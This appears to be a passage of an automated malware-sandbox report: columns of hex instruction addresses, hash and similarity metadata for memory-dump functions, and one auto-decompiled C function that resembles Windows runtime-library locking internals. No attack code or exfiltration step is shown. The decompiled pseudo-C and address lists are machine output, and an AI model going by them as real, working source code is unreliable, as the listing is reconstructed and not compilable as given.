                                  0x1e3bd8ac
                                  0x1e3bd8ae
                                  0x1e3bd8b4
                                  0x1e3bd8b4
                                  0x1e3bd8ae
                                  0x1e3bd7a5
                                  0x1e3bd78b
                                  0x1e3bd7b1
                                  0x1e40b3c5
                                  0x1e40b3c5
                                  0x1e3bd7c3
                                  0x1e3bd7ca
                                  0x1e3bd7e5
                                  0x1e3bd7eb
                                  0x1e3bd8eb
                                  0x1e3bd8ed
                                  0x00000000
                                  0x1e3bd8f3
                                  0x1e3bd8f3
                                  0x1e3bd8f3
                                  0x00000000
                                  0x1e3bd8ed
                                  0x1e3bd7cc
                                  0x1e3bd7cc
                                  0x1e3bd7d2
                                  0x00000000
                                  0x1e3bd7d4
                                  0x1e3bd7d4
                                  0x1e3bd7d7
                                  0x1e3bd7df
                                  0x1e40b3d4
                                  0x1e40b3d9
                                  0x1e40b3dc
                                  0x1e40b3dc
                                  0x1e40b3df
                                  0x1e40b3e2
                                  0x1e40b468
                                  0x1e40b46d
                                  0x1e40b46f
                                  0x1e40b46f
                                  0x1e40b475
                                  0x1e3bd8f8
                                  0x1e3bd8f9
                                  0x1e3bd8fd
                                  0x1e40b3e8
                                  0x1e40b3e8
                                  0x1e40b3eb
                                  0x1e40b3ed
                                  0x00000000
                                  0x1e40b3ef
                                  0x1e40b3ef
                                  0x1e40b3f1
                                  0x1e40b3f4
                                  0x1e40b3fe
                                  0x1e40b404
                                  0x1e40b409
                                  0x1e40b40e
                                  0x1e40b410
                                  0x1e40b410
                                  0x1e40b414
                                  0x1e40b414
                                  0x1e40b41b
                                  0x1e40b420
                                  0x1e40b423
                                  0x1e40b425
                                  0x1e40b427
                                  0x1e40b42a
                                  0x1e40b42d
                                  0x1e40b42d
                                  0x1e40b42a
                                  0x1e40b432
                                  0x1e40b436
                                  0x1e40b438
                                  0x1e40b43b
                                  0x1e40b43b
                                  0x1e40b449
                                  0x1e40b44e
                                  0x1e40b454
                                  0x1e40b458
                                  0x1e40b458
                                  0x1e40b45d
                                  0x00000000
                                  0x1e40b45d
                                  0x1e40b3ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bd7df
                                  0x1e3bd7d2
                                  0x1e3bd7ca
                                  0x1e40b37c
                                  0x1e40b37e
                                  0x1e40b385
                                  0x1e40b38a
                                  0x00000000
                                  0x1e40b38a
                                  0x1e3bd742
                                  0x1e3bd7f1
                                  0x1e3bd7f8
                                  0x1e40b49b
                                  0x1e40b49b
                                  0x1e3bd800
                                  0x1e3bd837
                                  0x1e3bd843
                                  0x1e3bd845
                                  0x1e3bd847
                                  0x1e3bd84a
                                  0x1e3bd84b
                                  0x1e3bd84e
                                  0x1e3bd857
                                  0x1e3bd802
                                  0x1e3bd802
                                  0x1e3bd80d
                                  0x00000000
                                  0x1e3bd818
                                  0x1e3bd818
                                  0x1e3bd824
                                  0x1e3bd831
                                  0x1e40b4a5
                                  0x1e40b4ab
                                  0x1e40b4b3
                                  0x1e40b4b8
                                  0x1e40b4bb
                                  0x00000000
                                  0x1e40b4c1
                                  0x1e40b4c1
                                  0x1e40b4c8
                                  0x00000000
                                  0x1e40b4ce
                                  0x1e40b4d4
                                  0x1e40b4e1
                                  0x1e40b4e3
                                  0x1e40b4e5
                                  0x00000000
                                  0x1e40b4eb
                                  0x1e40b4f0
                                  0x1e40b4f2
                                  0x1e3bdac9
                                  0x1e3bdacc
                                  0x1e3bdacf
                                  0x1e3bdad1
                                  0x1e3bdd78
                                  0x1e3bdd78
                                  0x1e3bdcf2
                                  0x00000000
                                  0x1e3bdad7
                                  0x1e3bdad9
                                  0x1e3bdadb
                                  0x00000000
                                  0x00000000
                                  0x1e3bdae1
                                  0x1e3bdae1
                                  0x1e3bdae4
                                  0x1e3bdae6
                                  0x1e40b4f9
                                  0x1e40b4f9
                                  0x1e40b500
                                  0x1e3bdaec
                                  0x1e3bdaec
                                  0x1e3bdaf5
                                  0x1e3bdaf8
                                  0x1e3bdafb
                                  0x1e3bdb03
                                  0x1e3bdb11
                                  0x1e3bdb16
                                  0x1e3bdb19
                                  0x1e3bdb1b
                                  0x1e40b52c
                                  0x1e40b531
                                  0x1e40b534
                                  0x1e3bdb21
                                  0x1e3bdb21
                                  0x1e3bdb24
                                  0x1e3bdcd9
                                  0x1e3bdce2
                                  0x1e3bdce5
                                  0x1e3bdd6a
                                  0x1e3bdd6d
                                  0x00000000
                                  0x1e3bdd73
                                  0x1e40b51a
                                  0x1e40b51c
                                  0x1e40b51f
                                  0x1e40b524
                                  0x00000000
                                  0x1e40b524
                                  0x1e3bdce7
                                  0x1e3bdce7
                                  0x1e3bdce7
                                  0x00000000
                                  0x1e3bdce7
                                  0x00000000
                                  0x1e3bdb2a
                                  0x1e3bdb2c
                                  0x1e3bdb31
                                  0x1e3bdb33
                                  0x1e3bdb36
                                  0x1e3bdb39
                                  0x1e3bdb3b
                                  0x1e3bdb66
                                  0x1e3bdb66
                                  0x1e3bdb3d
                                  0x1e3bdb3d
                                  0x1e3bdb3e
                                  0x1e3bdb46
                                  0x1e3bdb47
                                  0x1e3bdb49
                                  0x1e3bdb4c
                                  0x1e3bdb53
                                  0x1e3bdb55
                                  0x1e3bdb58
                                  0x1e3bdb5a
                                  0x1e40b50a
                                  0x1e40b50f
                                  0x1e40b512
                                  0x1e3bdb60
                                  0x1e3bdb60
                                  0x1e3bdb63
                                  0x1e3bdb63
                                  0x00000000
                                  0x1e3bdb63
                                  0x1e3bdb5a
                                  0x1e3bdb3b
                                  0x1e3bdb24
                                  0x1e3bdb69
                                  0x1e3bdb69
                                  0x1e3bdb6c
                                  0x1e3bdb6f
                                  0x1e3bdb74
                                  0x1e40b557
                                  0x1e40b557
                                  0x1e40b55e
                                  0x1e3bdb7a
                                  0x1e3bdb7c
                                  0x1e3bdb7f
                                  0x1e3bdb82
                                  0x1e3bdb85
                                  0x00000000
                                  0x1e3bdb8b
                                  0x1e3bdb8b
                                  0x1e3bdb8d
                                  0x1e3bdb9b
                                  0x1e3bdb9b
                                  0x1e3bdb9d
                                  0x1e3bdba0
                                  0x1e3bdba2
                                  0x1e3bdba4
                                  0x1e3bdba7
                                  0x1e3bdba9
                                  0x1e3bdbae
                                  0x1e3bdbae
                                  0x1e3bdbb1
                                  0x1e3bdbb4
                                  0x1e3bdbb4
                                  0x1e3bdbb7
                                  0x1e3bdbba
                                  0x1e3bdcd2
                                  0x1e3bdcd4
                                  0x00000000
                                  0x1e3bdbc0
                                  0x1e3bdbc0
                                  0x1e3bdbd2
                                  0x1e3bdbd7
                                  0x1e3bdbda
                                  0x1e3bdbdd
                                  0x1e3bdbdf
                                  0x00000000
                                  0x1e3bdbe5
                                  0x1e3bdbe5
                                  0x1e3bdbee
                                  0x1e3bdbf1
                                  0x1e40b541
                                  0x1e40b544
                                  0x00000000
                                  0x1e40b546
                                  0x1e40b546
                                  0x00000000
                                  0x1e40b546
                                  0x1e3bdbf7
                                  0x1e3bdbf7
                                  0x1e3bdbfd
                                  0x1e3bdbfd
                                  0x1e3bdbff
                                  0x1e3bdc0b
                                  0x1e3bdc15
                                  0x1e3bdc1b
                                  0x1e3bdc1d
                                  0x1e3bdc21
                                  0x1e3bdc21
                                  0x1e3bdc23
                                  0x1e3bdc23
                                  0x1e3bdc26
                                  0x1e3bdc29
                                  0x1e3bdc2b
                                  0x00000000
                                  0x00000000
                                  0x1e3bdc31
                                  0x1e3bdc34
                                  0x1e3bdc36
                                  0x1e3bdcbf
                                  0x1e3bdcbf
                                  0x1e3bdcc2
                                  0x00000000
                                  0x1e3bdc3c
                                  0x1e3bdc41
                                  0x1e3bdc43
                                  0x00000000
                                  0x1e3bdc45
                                  0x1e3bdc45
                                  0x1e3bdc47
                                  0x00000000
                                  0x1e3bdc4d
                                  0x1e3bdc4d
                                  0x1e3bdc50
                                  0x1e3bdc52
                                  0x1e3bdc55
                                  0x1e3bdcfa
                                  0x1e3bdcfe
                                  0x1e3bdd08
                                  0x1e3bdd0a
                                  0x1e3bdd0c
                                  0x00000000
                                  0x1e3bdd12
                                  0x1e3bdd15
                                  0x1e3bdd2d
                                  0x1e3bdd2f
                                  0x1e3bdd32
                                  0x1e3bdd35
                                  0x00000000
                                  0x1e3bdd35
                                  0x1e3bdc5b
                                  0x1e3bdc5b
                                  0x1e3bdc5e
                                  0x1e3bdc61
                                  0x1e3bdc64
                                  0x1e3bdc67
                                  0x1e3bdc67
                                  0x1e3bdc6a
                                  0x1e3bdc6c
                                  0x1e3bdc8e
                                  0x1e3bdc8e
                                  0x1e3bdc91
                                  0x1e3bdc93
                                  0x1e3bdcce
                                  0x1e3bdcce
                                  0x1e3bdc95
                                  0x1e3bdc9c
                                  0x1e3bdc6e
                                  0x1e3bdc72
                                  0x1e3bdc75
                                  0x1e3bdc77
                                  0x1e3bdc79
                                  0x1e40b551
                                  0x1e40b551
                                  0x00000000
                                  0x1e3bdc7f
                                  0x1e3bdc7f
                                  0x1e3bdc81
                                  0x00000000
                                  0x1e3bdc83
                                  0x1e3bdc86
                                  0x1e3bdc88
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bdc88
                                  0x1e3bdc81
                                  0x1e3bdc79
                                  0x1e3bdc6c
                                  0x1e3bdc55
                                  0x1e3bdc47
                                  0x1e3bdc43
                                  0x00000000
                                  0x1e3bdc36
                                  0x1e3bdc23
                                  0x00000000
                                  0x1e3bdbff
                                  0x1e3bdbf1
                                  0x1e3bdbdf
                                  0x1e3bdb8f
                                  0x1e3bdb92
                                  0x1e3bdb95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bdb95
                                  0x1e3bdb8d
                                  0x1e3bdb85
                                  0x1e3bdb74
                                  0x1e3bdc9f
                                  0x1e3bdca2
                                  0x1e3bdcb0
                                  0x1e3bdcb0
                                  0x1e3bdad1
                                  0x1e40b4e5
                                  0x1e40b4c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bd831
                                  0x1e3bd80d
                                  0x00000000
                                  0x1e3bd800
                                  0x1e40b47f
                                  0x1e40b485
                                  0x00000000
                                  0x1e40b485
                                  0x1e3bd665
                                  0x1e3bd652
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: p/w
                                  • API String ID: 3446177414-2009951664
                                  • Opcode ID: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
                                  • Instruction ID: 990119460426a5bba8234111266570bc9a48462a151cc847a07367bce9c12197
                                  • Opcode Fuzzy Hash: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
                                  • Instruction Fuzzy Hash: BEE1D634A00359CFDB24CF15C998BA9B7B6BF45314F4143AAD80AA7790D734AD85CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008AA32, Relevance: 1.9, Strings: 1, Instructions: 642COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                  • Instruction ID: 9b6c014c6cd631f79bd9085643210daf7a17b65454b9d5272e5449dae86de9a4
                                  • Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                  • Instruction Fuzzy Hash: 06226170B18A099FDB99EF68C4956AEF7E1FB98301F40422ED09ED7651DB30D851CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00089862, Relevance: 1.7, Strings: 1, Instructions: 478COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3dfbe1b75ea3d38e2b88d8326b172b3d98761bc5e5e4fe49fe8d3191d60ed7d9
                                  • Instruction ID: 16394727ae8117a72aaf6507545b84ece0078d463d062a28062892381eb6009d
                                  • Opcode Fuzzy Hash: 3dfbe1b75ea3d38e2b88d8326b172b3d98761bc5e5e4fe49fe8d3191d60ed7d9
                                  • Instruction Fuzzy Hash: C5F13070518A4C8FDBA9FF68C895AEEB7E1FB98304F40462AE48ED7251DF349641CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3D20A0, Relevance: 1.7, Strings: 1, Instructions: 420COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E1E3D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1e498714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E1E3D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E1E3D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E1E3A58EC(_t240);
									_t221 =  *0x1e495cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1e495cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E1E3E4A2C(0x1e496e40, 0x1e3e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E1E3C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1e385c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E1E3DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E1E427016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L1E3C2400(_t267 + 0x20);
															}
															L1E3C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E1E3D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E1E3C2280(_t134, 0x1e498608);
									__eflags =  *0x1e496e48 - _t253; // 0x770d60
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E1E3BFFB0(_t198, _t241, 0x1e498608);
										__eflags = _t253;
										if(_t253 != 0) {
											L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1e496e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1e498608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E1E3D6B90(_t210,  &_v64);
										_t262 =  *0x1e498608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E1E3DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E1E3E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E1E3E006A(0x1e498608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1e498608);
												E1E3EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1e496904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1e496e48; // 0x770d60
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E1E3BFFB0(_t198, _t240, 0x1e498608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E1E3E00C2(0x1e498608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                  0x1e3d20a0
                                  0x1e3d20a8
                                  0x1e3d20ad
                                  0x1e3d20b3
                                  0x1e3d20b8
                                  0x1e3d20c2
                                  0x1e3d20c7
                                  0x1e3d20cb
                                  0x1e3d20d2
                                  0x1e3d2263
                                  0x1e3d2266
                                  0x1e415836
                                  0x1e415836
                                  0x00000000
                                  0x1e3d226c
                                  0x1e3d226c
                                  0x1e3d2270
                                  0x1e3d2274
                                  0x1e3d20e2
                                  0x1e3d20e2
                                  0x1e3d20e6
                                  0x1e3d20ee
                                  0x1e4157dc
                                  0x1e4157de
                                  0x1e4157ec
                                  0x1e4157ec
                                  0x1e4157f1
                                  0x1e4157f3
                                  0x1e4157f8
                                  0x00000000
                                  0x1e4157f8
                                  0x1e4157e0
                                  0x1e4157e4
                                  0x1e4157ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e4157ea
                                  0x1e3d20f4
                                  0x1e3d20f4
                                  0x1e3d20f8
                                  0x1e3d20f8
                                  0x1e3d20fc
                                  0x1e3d2100
                                  0x1e3d2106
                                  0x1e3d2201
                                  0x1e3d2206
                                  0x1e3d220b
                                  0x1e3d220e
                                  0x1e3d22a9
                                  0x1e3d22ac
                                  0x00000000
                                  0x00000000
                                  0x1e3d22b2
                                  0x1e3d22b5
                                  0x1e415801
                                  0x1e415806
                                  0x00000000
                                  0x00000000
                                  0x1e415810
                                  0x1e415815
                                  0x1e415818
                                  0x00000000
                                  0x00000000
                                  0x1e41581e
                                  0x1e3d22bb
                                  0x1e3d22bb
                                  0x1e3d2218
                                  0x1e3d2218
                                  0x1e3d221c
                                  0x1e3d2220
                                  0x1e3d2222
                                  0x1e3d22c2
                                  0x1e3d22c4
                                  0x1e3d22dc
                                  0x1e3d22dc
                                  0x1e3d22e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3d22e7
                                  0x1e3d22c8
                                  0x1e3d22cd
                                  0x1e3d22d3
                                  0x1e3d22d6
                                  0x1e415823
                                  0x1e415825
                                  0x1e415827
                                  0x00000000
                                  0x00000000
                                  0x1e41582d
                                  0x00000000
                                  0x1e41582d
                                  0x00000000
                                  0x1e3d2228
                                  0x1e3d2228
                                  0x00000000
                                  0x1e3d2228
                                  0x1e3d2222
                                  0x1e3d2214
                                  0x1e3d2214
                                  0x00000000
                                  0x1e3d2114
                                  0x1e3d2114
                                  0x1e3d2114
                                  0x1e3d211a
                                  0x1e3d211c
                                  0x1e3d2348
                                  0x1e3d234d
                                  0x1e415840
                                  0x1e415845
                                  0x1e415848
                                  0x1e41584e
                                  0x1e41584e
                                  0x1e415848
                                  0x1e3d2353
                                  0x1e3d2355
                                  0x1e3d2388
                                  0x1e3d2388
                                  0x1e3d2368
                                  0x1e3d236a
                                  0x1e3d236c
                                  0x1e3d238f
                                  0x00000000
                                  0x1e3d236e
                                  0x1e3d236e
                                  0x1e3d218e
                                  0x1e3d218e
                                  0x1e3d2191
                                  0x1e3d2195
                                  0x1e415a03
                                  0x1e415a06
                                  0x1e415a0c
                                  0x1e415a0f
                                  0x1e415a11
                                  0x1e415a13
                                  0x1e415a13
                                  0x1e415a19
                                  0x1e415a1f
                                  0x00000000
                                  0x1e3d219b
                                  0x1e3d219b
                                  0x1e3d21a0
                                  0x1e3d2282
                                  0x1e3d2284
                                  0x1e3d2284
                                  0x1e3d2284
                                  0x1e3d2284
                                  0x1e3d21a6
                                  0x1e3d21a9
                                  0x1e3d21ac
                                  0x1e3d21ae
                                  0x1e3d21b3
                                  0x1e3d228b
                                  0x1e3d2290
                                  0x1e3d2379
                                  0x1e3d2296
                                  0x1e3d2298
                                  0x1e3d2298
                                  0x1e3d2290
                                  0x1e3d21b9
                                  0x1e3d21be
                                  0x1e3d22a2
                                  0x1e3d22a2
                                  0x1e3d21c4
                                  0x1e3d21c8
                                  0x1e3d21cc
                                  0x1e3d21d0
                                  0x1e3d21d4
                                  0x1e3d21de
                                  0x1e3d21e3
                                  0x1e415a29
                                  0x1e415a2c
                                  0x00000000
                                  0x00000000
                                  0x1e415a3b
                                  0x00000000
                                  0x1e3d21e9
                                  0x1e3d21e9
                                  0x1e3d21e9
                                  0x1e3d21ee
                                  0x1e3d21f1
                                  0x1e415a45
                                  0x1e415a4b
                                  0x1e415a52
                                  0x1e415a58
                                  0x1e415a5d
                                  0x1e415a5f
                                  0x1e415a71
                                  0x1e415a61
                                  0x1e415a6a
                                  0x1e415a6a
                                  0x1e415a76
                                  0x1e415a79
                                  0x1e415a7f
                                  0x1e415a83
                                  0x1e415a85
